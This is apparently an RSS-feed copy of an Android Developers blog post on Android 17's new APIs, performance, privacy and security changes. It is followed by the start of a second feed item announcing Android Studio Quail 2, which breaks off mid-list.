<p>Android 17 adds Continue On to help users seamlessly transition a task between Android devices. The user sees a suggestion for the most recently opened app from their mobile device in their tablet taskbar, providing a one-tap affordance to launch the app and deep-link where they left off. Continue on can support app-to-web transitions, including falling back to using the web if the app isn't installed.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s1920/Continue%20On.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s16000/Continue%20On.png"></a><i>Handoff Suggestion on a Tablet</i></div><p><br></p>

<pre><code>class MyHandoffActivity : Activity() {

    ...

  override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    // Do stuff
    ...
    // Enable handoff
    setHandoffEnabled(true, null)
  }

  // Override and implement onHandoffActivityDataRequested
  override fun onHandoffActivityDataRequested(handoffRequestInfo: HandoffActivityDataRequestInfo) : HandoffActivityData {
    // Create and return handoff data
  }
}</code></pre>

<h2>Go adaptive-first with Jetpack Compose</h2>
<p>To help you adapt your apps to meet the new Android 17 requirements, we've launched the <a href="https://github.com/android/skills/tree/main/jetpack-compose/adaptive">Jetpack Compose adaptive skill</a>. This AI-powered developer workflow helps you implement the best adaptive practices:</p>
<ul>
    <li><strong>Adaptive navigation:</strong> Automatically transition between bottom navigation bars on mobile and edge-anchored navigation rails on large screens using NavigationSuiteScaffold from the Material 3 Adaptive library.</li>
    <li><strong>Multi-pane layouts:</strong> Implement list-detail and supporting pane layouts natively using Navigation 3 Scenes (ListDetailSceneStrategy and SupportingPaneSceneStrategy) instead of fragile fragment transactions.</li>
    <li><strong>FlexBox &amp; Grid APIs:</strong> Utilize Compose 1.11's dynamic layout components to easily adjust row and column spans on the fly, ensuring your content always fills the space beautifully.</li>
    <li><strong>Advanced non-touch input:</strong> Leverage Compose 1.11's enhanced trackpad and mouse support, including native focus rings and new APIs (like TrackpadInjectionScope and performTrackpadInput) to easily test and deliver a true "laptop-class" experience on Googlebooks and Desktop Mode.</li>
    <li><strong>Dynamic window states:</strong> Leverage Compose's reactive state model to seamlessly adapt your UI when the app transitions from full screen to a floating App Bubble or an interactive Desktop PiP window, ensuring a premium experience even at minimal dimensions.</li>
</ul>

<h2>Android is Compose-first</h2>
<p>Compose offers the easiest way to build adaptive apps, and that's just one of the <a href="https://developer.android.com/develop/ui/compose/first#why-compose-first">many reasons</a> we believe that all Android UI should be built with Compose. To that end, <a href="https://developer.android.com/develop/ui/compose/first">Android development is now Compose-first</a>. All new Android APIs, libraries, tools, and developer guidance will be built exclusively for Jetpack Compose. Legacy View components (in the android.widget package) and View-based Jetpack libraries (like Fragments, RecyclerView, and ViewPager) are now in maintenance mode. They will receive only critical bug fixes, and no new features.</p>

<blockquote>
    <p><strong>TIP</strong><br>
    Ready to migrate? Use our AI-driven <a href="https://developer.android.com/develop/ui/compose/migrate/migrate-xml-views-to-jetpack-compose">XML to Compose Migration Skill</a> to automatically analyze your legacy View layouts and convert them into highly-adaptive Compose code.</p>
</blockquote>

<h3>Performance &amp; efficiency</h3>
<p>App performance means a smooth user interface, fast app start times, and efficient multitasking; Android 17 has impactful improvements in all of these areas.</p>

<h2>App memory limits</h2>
<p>Memory usage is one of the silent foundations of overall performance. When a foreground app or service grows unchecked, memory management spikes CPU and battery utilization and eventually leads to the termination of other well-behaved cached apps and background jobs, ultimately forcing slower cold starts and impaired multitasking. </p>

<p>Starting in Android 17, the system will enforce strict app memory limits based on a device's total RAM, abruptly terminating offending processes. New things to help you navigate these tighter requirements:</p>
<ul>
    <li><strong>R8 Optimizer:</strong> The R8 optimizer significantly reduces your app's bytecode memory footprint by shrinking classes, methods, and fields into shorter names, and stripping out unused code and resources. Use R8 in full mode along with the new <a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer">R8 configuration analyzer</a> to make sure your app is getting the most from R8.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s2048/R8%20Configuration%20Analyzer.png"><img border="0" data-original-height="397" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s16000/R8%20Configuration%20Analyzer.png"></a></div></li></ul><div><span><u><br></u></span></div><div><span><u><br></u></span></div><div><br></div><div><br></div><div>The R8 Configuration Analyzer</div><ul><li><strong>LeakCanary in Android Studio Panda:</strong> The profiler now features native LeakCanary integration as a dedicated task, fully integrated with your IDE and source code.</li>
    <li><strong>ApplicationExitInfo:</strong> If your app is terminated by these limits, getDescription() from ApplicationExitInfo will return "MemoryLimiter:AnonSwap".</li>
    <li><strong>On-Device Anomaly Detection:</strong> Part of ProfilingManager, you can leverage trigger-based profiling using TRIGGER_TYPE_ANOMALY to automatically capture heap dumps when the memory limit is reached.</li>
</ul>

<pre><code>val profilingManager = applicationContext
   .getSystemService(ProfilingManager::class.java)

val triggers = ArrayList&lt;ProfilingTrigger&gt;().apply {
  add(ProfilingTrigger.Builder(
    ProfilingTrigger.TRIGGER_TYPE_ANOMALY).build())
}
profilingManager.addProfilingTriggers(triggers)</code></pre>

<p>And, we're working to surface more in-field memory metrics to you within Google Play Console.</p>

<h2>Generational garbage collection</h2>
<p><a href="https://developer.android.com/about/versions">Android 17</a> introduces more frequent, less resource-intensive young-generation collections to <a href="https://developer.android.com/guide/platform#art">ART</a>'s Concurrent Mark-Compact garbage collector (GC). By separating short-lived objects from stable, long-lived ones, the system runs frequent, lightweight "young-generation" sweeps rather than expensive full-heap scans, drastically reducing CPU usage, power drain, and UI stutter. Our testing has shown significant improvements in GC interference with application threads and a reduction in the maximum memory resident set size (RSS). ART improvements are also available to over a billion devices running Android 12 (API level 31) and higher through Google Play System updates.</p>

<h2>Lock-Free MessageQueue</h2>
<p>For apps targeting SDK 37 or higher, the core <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>android.os.MessageQueue</b></a> now implements a lock-free architecture, significantly reducing missed frames, improving app startup time, and radically improving the performance of busy queues in multithreaded scenarios. Note: This can break apps that use reflection on private <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> fields and methods.  The <a href="https://developer.android.com/reference/android/os/TestLooperManager#peekWhen()"><b>peekWhen</b></a> and <b><a href="https://developer.android.com/reference/android/os/TestLooperManager#poll()">poll</a> </b>APIs have been added to <a href="https://developer.android.com/reference/android/os/TestLooperManager"><b>TestLooperManager</b></a> for instrumentation testing without relying on <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> internals.</p>

<h2>Static final fields now truly final</h2>
<p>Starting from Android 17, apps targeting SDK 37 or higher won’t be able to modify “static final” fields, allowing the runtime to apply performance optimizations more aggressively. An attempt to do so via reflection (or deep reflection) will lead to an IllegalAccessException being thrown. Modifying them via JNI’s <b><code>SetStatic&lt;Type&gt;Field</code></b> methods family will immediately crash the application.</p>

<h2>Custom notification view restrictions</h2>
<p>To reduce memory usage we are further restricting the size of <a href="https://developer.android.com/develop/ui/views/notifications/custom-notification">custom notification views</a>. This update closes a loophole that allows apps to bypass existing limits using URIs. This behavior is gated by the target SDK version and takes effect for apps targeting API 37 and higher.</p>

<h3>Privacy &amp; Security</h3>
<p>Maintaining user trust is at the heart of the Android ecosystem. Android 17 introduces robust features that protect sensitive data while simplifying user experiences.</p>

<h2>Privacy-preserving choices</h2>
<p>Historically, apps required broad, permanent permissions to access information like contacts, precise location and media files. Android 17 continues the shift toward privacy-preserving choices that grant temporary, session-based access only to the data the user explicitly selects:</p>
<ul>
  <li><strong>System-Level Contact Picker:</strong> Utilizing <code>ACTION_PICK_CONTACTS</code>, apps can request temporary access only to specific fields (e.g., email or phone number) chosen by the user, eliminating the need for the broad <code>READ_CONTACTS</code> permission. It also fully supports work/personal profile separation.</li>
    <li><strong>Customizable Photo Picker aspect ratio:</strong> Using<b><code>PhotoPickerUiCustomizationParams</code></b>, you can customize the system photo picker to show thumbnails in portrait mode. This is perfect for apps that always display photos and videos in portrait such as video based social media apps.</li>
    <li><strong>System-rendered Location Button:</strong> A new system-rendered location button that you can embed in your app grants precise location access for the current session only.</li>
    <li><strong>EyeDropper API:</strong> A new system-level API, <code>ACTION_OPEN_EYE_DROPPER</code>, allows your app to create a system-powered eyedropper enabling the user to select color from any pixel on the display. This provides a secure, privacy-preserving color-picking experience that eliminates the need for broad, sensitive screen capture or media projection permissions.</li>
</ul>

<pre><code>val eyeDropperLauncher = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result -&gt;
   if (result.resultCode == Activity.RESULT_OK) {
       val color = result.data?.getIntExtra(Intent.EXTRA_COLOR, Color.BLACK)
       // Use the picked color in your app
   }
}
fun launchColorPicker() {
   val intent = Intent(Intent.ACTION_OPEN_EYE_DROPPER)
   eyeDropperLauncher.launch(intent)
}</code></pre>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/s1267/Eyedropper%20Tester.webp"><img border="0" data-original-height="713" data-original-width="1267" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/w640-h360/Eyedropper%20Tester.webp" width="640"></a></div><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><span><span face="Arial, sans-serif"><i>Picking a color from anywhere on the screen with the system EyeDropper</i></span></span></h3><h2>Local network access</h2>
<p>Apps targeting Android 17 now either require the <code><a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network">ACCESS_LOCAL_NETWORK</a></code> runtime permission or the use of system-mediated, privacy-preserving device pickers for local network communication, such as talking to smart home devices or casting receivers. Because <code>ACCESS_LOCAL_NETWORK</code>  falls under the existing <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permission group, users who have already granted other <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permissions will not be prompted again. </p>

<h2>SMS OTP protection</h2>
<p>Android 17 expands SMS one-time-password (OTP) protection by delaying access to SMS messages for three hours:</p>
<ul>
  <li>WebOTP Format: <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">Delayed for all apps that are not the intended recipient (domain mismatch)</a>.</li>
  <li>Standard SMS OTP: <a href="https://developer.android.com/about/versions/17/behavior-changes-17#sms-otp-protection">Delayed for all apps targeting SDK 37+</a>.</li>
  <li>Exemptions: Default SMS, assistant, and connected companion apps are exempt. Apps are strongly encouraged to migrate to the <a href="https://developer.android.com/identity/sms-retriever">SMS Retriever</a> or <a href="https://developers.google.com/identity/sms-retriever/user-consent/overview">SMS User Consent APIs</a>.</li>
</ul>

<h2>Post-Quantum Cryptography (PQC)</h2>
<p>Android 17 is ready for the next generation of cryptographic security:</p>
<ul>
  <li>Keystore Integration: Supported devices can generate ML-DSA (Module-Lattice-Based Digital Signature Algorithm) keys in secure hardware to produce quantum-safe signatures, exposed via standard JCA APIs.</li>
  <li>Hybrid APK Signing: Introducing the v3.2 APK Signature Scheme, which combines classical signatures with ML-DSA signatures to secure app delivery.</li>
</ul>

<h2>Safer native dynamic code loading </h2>
If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14</a> for DEX and JAR files now extends to native libraries. All native files loaded using System.load must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError

<h2>Smarter password protection for physical inputs</h2>
<p>With Android 17, we're making it safer to enter passwords, PINs, and other secrets when using a physical keyboard by no longer showing the last typed character by default.</p>
<p>Users can still easily customize these display settings to match their preferences (availability may vary by device manufacturer).</p>
<p>These enhanced privacy protections are automatically supported byAndroid's built-in SDK components and will be supported in Compose 1.12 for SecureTextFields. </p>

<h3><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s798/Hide%20First%20Letter.gif"><img border="0" data-original-height="449" data-original-width="798" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s16000/Hide%20First%20Letter.gif"></a></div></h3><h3><br></h3><h3><br></h3><h3><br></h3><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><i><div><i>Smarter password protection for physical inputs</i></div></i><div><br></div><h2>Media and camera features that empower creators and delight users
</h2><p>Android 17 introduces new <a href="https://blog.google/products-and-platforms/platforms/android/android-17-creator-features/">creator features</a> that give access to pro-quality cameras and media, all while improving the experience for consumers.</p>

<ul>
  <li><a href="https://developer.android.com/media/platform/integrate-eclipsa-video">Eclipsa Video</a>: HDR video standard built upon the <a href="https://github.com/SMPTE/st2094-50">SMPTE ST 2094-50 specification</a> that introduces new metadata to help devices adapt content for their display headroom and ambient light conditions, as well as improve the simultaneous display of standard and HDR content.</li>
  <li>RAW14 image format: New support for the <a href="https://developer.android.com/reference/kotlin/android/graphics/ImageFormat#raw14">RAW14 image format</a> provides a way for your professional camera app to capture the highest level of detail and color depth from compatible camera sensors.</li>
  <li>Vendor-defined camera extensions: Vendor-defined extensions enable hardware partners to define and implement custom camera extension modes, providing access to the best and latest camera features.</li>
  <li>Extended HE-AAC software encoder: A new system-provided Extended HE-AAC software encoder, supports both low and high bitrates using unified speech and audio coding, providing significantly better audio quality for voice messages in low-bandwidth conditions, including support for loudness metadata.</li>
  <li><a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">Versatile Video Coding (H.266)</a>:  Enables OEMs to add codec support by defining the <a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">video/vvc</a> MIME type in <a href="https://developer.android.com/reference/android/media/MediaFormat"><code>MediaFormat</code></a>, adding new VVC profiles in <a href="https://developer.android.com/reference/android/media/MediaCodecInfo"><code>MediaCodecInfo</code></a>, and integrating support into <a href="https://developer.android.com/reference/android/media/MediaExtractor"><code>MediaExtractor</code></a>.</li>
  <li>Camera device type: New APIs that query the underlying device type to identify if a camera is built-in hardware, an external USB webcam, or a virtual camera.</li>
  <li>Constant Quality for Video Recording: <a href="https://developer.android.com/reference/android/media/MediaRecorder#setVideoEncodingQuality(int)"><code>SetVideoEncodingQuality</code></a> in <a href="https://developer.android.com/reference/android/media/MediaRecorder"><code>MediaRecorder</code></a> configures a constant quality (CQ) mode for video encoders to ensure uniform visual fidelity across the entire video.</li>
</ul>

<h2>Better support for hearing aids</h2>
<ul>
  <li>Bluetooth LE Audio hearing aid support: Android now includes a specific device category for Bluetooth Low Energy (BLE) Audio hearing aids with the new <a href="https://developer.android.com/reference/android/media/AudioDeviceInfo#TYPE_BLE_HEARING_AID"><code>AudioDeviceInfo.TYPE_BLE_HEARING_AID</code></a> constant, so your app can distinguish hearing aids from regular headsets to provide a tailored experience for users with assistive listening devices.</li>
  <li>Granular audio routing for hearing aids: Android 17 allows users to independently manage where specific system sounds are played. They can choose to route notifications, ringtones, and alarms to connected hearing aids or the device's built-in speaker, helping to avoid unwanted in-ear interruptions while maintaining a Bluetooth connection for hearing aid management apps.</li>
</ul>

<h2>CameraX and  Media3</h2>
<p><a href="https://developer.android.com/jetpack/androidx/releases/camerax">CameraX</a> and <a href="https://developer.android.com/jetpack/androidx/releases/media3">Media3</a> have been updated for Android 17. They are there to do the heavy lifting, smoothing the rough edges of media development and simplifying building reliable camera capture,  smooth media playback, and creative and complex editing experiences. </p>

<p>We've released an <a href="https://github.com/android/skills/tree/main/camera">agent skill</a> that can migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</p>
  
<p>Note: You'll need to update your CameraX version to either 1.5.2 or 1.6.0+ to avoid a crash related to an added dynamic range mode on Android 17 devices.</p>

<h3>Get your apps, libraries, tools, and game engines ready!</h3>
<p>If you develop an Android SDK, library, tool, or game engine, it's critical to prepare any necessary updates now to prevent your downstream app and game developers from being blocked by compatibility issues and allow them to target the latest SDK features. Please let your downstream developers know if updates are needed to fully support Android 17.</p>

<p>Testing involves installing your production app or a test app making use of your library or engine using Google Play or other means onto a device or emulator running Android 17 Beta 4. Work through all your app's flows and look for functional or UI issues. Each release of Android contains platform changes that improve privacy, security, and overall user experience; review the app impacting behavior changes for apps <a href="https://developer.android.com/about/versions/17/behavior-changes-all">running on</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-17">targeting</a> Android 17 to focus your testing, including the following:</p>
<ul>
  <li>Resizability on large screens: Once you target Android 17 (SDK 37), you can no longer opt out of maintaining orientation, resizability and aspect ratio constraints <a href="https://developer.android.com/about/versions/17/changes/ff-restrictions-ignored">on large screens</a>.</li>
  <li>Dynamic code loading: If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14 </a>for DEX and JAR files now extends to native libraries. All native files loaded using System.load() must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError.</li>
  <li>Enable CT by default: <a href="https://developer.android.com/privacy-and-security/security-config#CertificateTransparencySummary">Certificate transparency (CT)</a> is enabled by default. (On Android 16, CT is available but apps had to <a href="https://developer.android.com/privacy-and-security/security-config#certificateTransparency">opt in</a>.)</li>
  <li>Local network protections: Apps targeting SDK 37 or higher have <a href="https://developer.android.com/privacy-and-security/local-network-permission#android-17-enforcement">local network access blocked by default</a>. Switch to using privacy preserving pickers if possible, and use the new <a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"><b><code>ACCESS_LOCAL_NETWORK</code></b>permission for broad, persistent access.</a></li>
  <li>Background audio hardening: Starting in Android 17, the audio framework enforces <a href="https://developer.android.com/about/versions/17/changes/bg-audio">restrictions on background audio interactions</a> including audio playback, <a href="https://developer.android.com/media/optimize/audio-focus">audio focus</a> requests, and <a href="https://developer.android.com/reference/android/media/AudioManager#adjustStreamVolume(int,%20int,%20int)">volume change</a> APIs. Based on your feedback, we’ve made some changes since beta 2, including targetSDK gating while-in-use FGS enforcement and exempting alarm audio. Full details available in the <a href="https://developer.android.com/about/versions/17/changes/bg-audio">updated guidance</a>.</li>
  <li>NPU access declaration: Apps targeting Android 17 that need to directly access the NPU must declare <a href="https://developer.android.com/reference/kotlin/android/content/pm/PackageManager#feature_neural_processing_unit">FEATURE_NEURAL_PROCESSING_UNIT</a> in their manifest to avoid being blocked from accessing the NPU. This includes apps that use the <a href="https://ai.google.dev/edge/litert/next/npu">LiteRT NPU delegate</a>, vendor-specific SDKs, as well as the deprecated <a href="https://developer.android.com/ndk/guides/neuralnetworks">NNAPI</a>.</li>
</ul>

<h3>Get started with Android 17</h3>
<p>Your Pixel device should get Android 17 shortly if you haven't already been on the Android Beta. If you don’t have a Pixel device, you can <a href="https://developer.android.com/about/versions/17/get#on_emulator">use the 64-bit system images with the Android Emulator</a> in Android Studio. If you are currently on Android 17 Beta 4.1 and have not yet taken an Android 17 QPR1 beta, you can opt out of the program and you will then be offered the release version of Android 17 over the air.</p>
<h3>Getting the Android 17 beta on partner devices</h3>
<p>Android 17 is available in beta on handset, tablet, and foldable form factors <a href="https://developer.android.com/about/versions/17/devices">from partners</a> including Honor, iQOO, Lenovo, OnePlus, OPPO, Realme, Sharp, vivo, and Xiaomi.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s1653/android-17-beta-partners.jpg"><img border="0" data-original-height="624" data-original-width="1653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s16000/android-17-beta-partners.jpg"></a></div><br><h3><br></h3>

<p>For the best development experience with Android 17, we recommend that you use the latest Canary build of <a href="https://developer.android.com/studio/preview">Android Studio Quail</a>. Once you’re set up, here are some of the things you should do:</p>
<p>Test your current app for compatibility, learn whether your app is <a href="https://developer.android.com/about/versions/17/behavior-changes-all">affected by changes in Android 17</a>, and install your app onto a device or <a href="https://developer.android.com/studio/run/emulator">Android Emulator</a> running Android 17 and extensively test it.</p>

<p>Thank you again to everyone who participated in our Android developer preview and beta program. We're looking forward to seeing how your apps take advantage of the updates in Android 17, and have plans to bring you updates in a fast-paced release cadence going forward.</p>
<p>For complete information on Android 17 please visit the <a href="https://developer.android.com/about/versions/17">Android 17 developer site</a>.</p><br><br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Studio Quail 2 is Stable: Multi-task with the Android Studio AI agent]]></title>
<description><![CDATA[Posted by Amman Asfaw, Product Manager, Android Studio

Android Studio Quail 2 is now stable and ready for you to use in production, bringing a shift to your IDE with concurrent agentic workflows, natively integrated memory leak profiling, and context-aware crash remediation. Whether you are perf...]]></description>
<link>https://tsecurity.de/de/3693500/android-tipps/android-studio-quail-2-is-stable-multi-task-with-the-android-studio-ai-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693500/android-tipps/android-studio-quail-2-is-stable-multi-task-with-the-android-studio-ai-agent/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:29 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitwUFdkGaqVNsaJ2iCtprD4WZuFjvI1rR6WX35ewxin0wbtVadUtkRb3qYG-KGEKepmtC4WFv2mSAmUBRmZ-oR5ey_-codg1_MhbagflhqgWk2MdNX6-yL8SaADve6mn3v0aJ_uh-qLizIgdImHaQ_KdJfVYqvCga_v_fyJYPHKDyhuhVklAfo145xays/s2461/QuailBlog_Meta.png"><p>Posted by Amman Asfaw, Product Manager, Android Studio</p><p></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-nTZM4cgutSVcLIdjSDqJoeiaES_FELwFC84O01Roy0P81-mAyqz3X2w4pwzAZwdhiMeUuhRSyT4euWZkWtGderw6LRu-fK6k-w8lB-9k7GMXOFBy0IzgtGmUk6QkRriFX24lchlTD0SQhbywxli4p4iZ7JzMAN80YoCdruEeruJ58bwhmuo0cj9Y_yg/s2152/QuailMovement_V1_a.gif"><img border="0" data-original-height="608" data-original-width="2152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-nTZM4cgutSVcLIdjSDqJoeiaES_FELwFC84O01Roy0P81-mAyqz3X2w4pwzAZwdhiMeUuhRSyT4euWZkWtGderw6LRu-fK6k-w8lB-9k7GMXOFBy0IzgtGmUk6QkRriFX24lchlTD0SQhbywxli4p4iZ7JzMAN80YoCdruEeruJ58bwhmuo0cj9Y_yg/s1600/QuailMovement_V1_a.gif"></a></div><br><p></p><p><br></p><p><br></p><p><br></p>

<p>Android Studio Quail 2 is now stable and ready for you to use in production, bringing a shift to your IDE with concurrent agentic workflows, natively integrated memory leak profiling, and context-aware crash remediation. Whether you are performing a sweeping architectural overhaul, tracing a memory leak, or resolving a critical production crash, Android Studio keeps you anchored in your workspace by reducing manual friction.</p>
<p>Here’s a deep dive into what’s new:</p>
<h2>Multi-tasking with parallel chats</h2>

<p>In Android Studio Quail 2, we've been hard at work redesigning Agent Mode from the ground up. This new architecture provides better performance, offers more flexibility for decomposing complex tasks, and improves the suite of internal tools the agent uses to do its work.</p>In addition to these behind-the-scenes improvements, these changes also allow you to converse across multiple agent chats simultaneously. Waiting for the Android Studio agent to finish a task before you can ask another question or initiate a separate task in Agent Mode is a bottleneck of the past. You can multi-task seamlessly: kick off a UI refactor in one tab, fix a ProGuard rule in a second, and generate documentation in a third.<br><br> You can also change which models the agent uses from chat to chat based on the requests you have. Take a look at <a href="http://d.android.com/bench">Android Bench</a> for an analysis of how LLMs perform Android development tasks. 

<p></p><ul><li><strong>How to use:</strong> Click the "+" icon to start a new parallel conversation, and use the <b>History</b> icon to navigate between active tasks. Alternatively, select File &gt; New &gt; New Agent Tab to open a conversation in a dedicated tab.</li><li><strong>Note:</strong> Worktree support is currently unavailable. Exercise caution when running concurrent chats that modify the same project files, which can potentially lead to editor conflicts.</li></ul><p></p>

<div class="separator">
  
</div>

<p><i>Run multiple agent tasks in parallel with different models of your choice.</i></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwUDucsd939pAvvfRC8VvmNkDp-1nDBMaP3TGFwdjspFgPz7_CVS-7NVzNhP278oKO3MNJL0RZy3k9aCZgmVtuqsahIZh79bGXhB026yKqPPiMYVMFkkSUgTBSLLajNObkMkke_iF6i_cIMRRQ_5Zl8zLgXWKYItToSiyLaZfok-pd-KVkAkRfup_yCsI/s3456/Screenshot%202026-06-17%20at%2012.56.57%E2%80%AFAM.png"><img border="0" data-original-height="2044" data-original-width="3456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwUDucsd939pAvvfRC8VvmNkDp-1nDBMaP3TGFwdjspFgPz7_CVS-7NVzNhP278oKO3MNJL0RZy3k9aCZgmVtuqsahIZh79bGXhB026yKqPPiMYVMFkkSUgTBSLLajNObkMkke_iF6i_cIMRRQ_5Zl8zLgXWKYItToSiyLaZfok-pd-KVkAkRfup_yCsI/s1600/Screenshot%202026-06-17%20at%2012.56.57%E2%80%AFAM.png"></a></div><span><div><i>Use the History icon to navigate between active tasks.</i></div></span><p></p>

<h2>Memory leak detection with LeakCanary</h2>

<p>Memory leaks in Android occur when your code holds onto an object's reference long after its life cycle has ended. This prevents the Garbage Collector from reclaiming that memory, eventually leading to sluggish performance or <code>OutOfMemoryError</code>.</p>

<p>Hunting down memory leaks can be a tedious, manual task. Starting with Android Studio Quail 2, the popular open-source leak detector <a href="https://square.github.io/leakcanary/">LeakCanary</a> is natively integrated directly into the Profiler as a dedicated, first-class task.</p>

<p>This integration transforms your debugging performance by lifting and shifting the heap analysis off your resource-constrained testing phone, and onto your powerful development computer. By running the analysis on your computer, leak tracing is up to five times faster and jank-free, leaving your test app running smoothly on the device.</p>

<p>Once a leak is detected during a profiling session:</p>
<ul>
  <li>The Profiler renders an interactive, color-coded leak trace, grouping occurrences and estimating lost memory.</li>
  <li>You can click <b>Go to declaration</b> on any leaking object in the trace to instantly jump to that exact line of code in your editor.</li>
